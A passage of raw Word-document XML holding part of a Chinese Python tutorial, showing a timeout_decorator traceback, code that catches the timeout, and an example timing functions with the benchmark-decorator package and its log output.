    <w:p w14:paraId="41653D82" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>line 81, in new_function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F56A35" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">    return function(*args, **kwargs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F8661E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  File "timeoutdemo1.py", line 8, in func_with_time_limit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C727832" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">    time.sleep(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E79F433" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079A20CC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"/anaconda3/lib/python3.7/site-packages/timeout_decorator/timeout_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE8E489" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">        decorator.py",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07943EFA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>line 72, in handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D40C32D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">    _raise_exception(timeout_exception, exception_message)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188C84B2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CB50FE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"/anaconda3/lib/python3.7/site-packages/timeout_decorator/timeout_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEF002E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">        decorator.py",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE6D1BC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>line 45, in _raise_exception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1808D7CA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">    raise exception()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264B2698" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>timeout_decorator.timeout_decorator.TimeoutError: 'Timed Out'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C145044" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2257F947" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以发现，在超时后它会自动抛出异常，我们可以捕捉该异常。下面是修改后的代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2402D197" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B2F5B8F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D83E4A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import timeout_decorator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDA5F58" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">@timeout_decorator.timeout(5)                   # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>不能超时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>秒</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2088913C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>def func_with_time_limit():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3238623F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    print("Start")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381DCE40" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    for i in range(1,10):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7E2C0A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        time.sleep(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056C5DB8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        print("{} seconds have passed".format(i))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29540668" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>if __name__ == '__main__':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17867DDA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D96E545" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        func_with_time_limit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E65013" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>except:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9AB1BB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">        print("Time-out")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA1420D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="186FD4E0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>、执行时间标定</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15465B70" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="472E84CB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有时需要统计出某个函数每次执行的时间，此时既可以使用在函数执行之前和之后获取系统时间，然后通过计算得到实际运行时间，也可以使用现成的装饰器来达到这个目的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA946EC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F12AA25" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里介绍的装饰器是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> benchmark-decorator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这个装饰器也是需要读者自行安装的。安装命令如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A162230" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>pip install benchmark-decorator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2A4FA0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="283D6BD7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面是一个使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>benchmark-decorator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>装饰器的例子。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575EF238" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707F2362" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>from benchmark import Benchmark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">         # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引入标定模块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587D6D06" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">@Benchmark() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                           # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标定该函数的执行时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECC53EC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def do_real_work1():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBC6F48" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    time.sleep(0.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B06023C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    return 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109092EA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">@Benchmark()                            # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标定该函数的执行时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1560C9B1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def do_real_work2():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2644FF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    time.sleep(0.2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0031BF3C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    return 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F82170C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">@Benchmark()                            # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标定该函数的执行时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBAEE52" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def func_benchmarked():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A558227" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    print("Start")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6F17AC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    for i in range(1,10):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EBF720" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        do_real_work1()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C747812" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        do_real_work2()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2EFE2A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>if __name__ == '__main__':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D970DF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    func_benchmarked ()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CBC5CB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行该脚本后会发现，在当前目录下多了一个文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> bench.log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，标定数据都记录在该文件中了。下面是该文件的内容：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486FF215" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2019-07-28 06:10:05,921 - BENCHMARK - INFO - do_real_work1: 0.10025286674499512</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A6FADB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2019-07-28 06:10:06,123 - BENCHMARK - INFO - do_real_work2: 0.20151209831237793</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F25443" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2019-07-28 06:10:06,227 - BENCHMARK - INFO - do_real_work1: 0.10357093811035156</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C976ABB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2019-07-28 06:10:06,431 - BENCHMARK - INFO - do_real_work2: 0.2039330005645752</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E639FC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>......</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564B5F46" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2492DB78" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
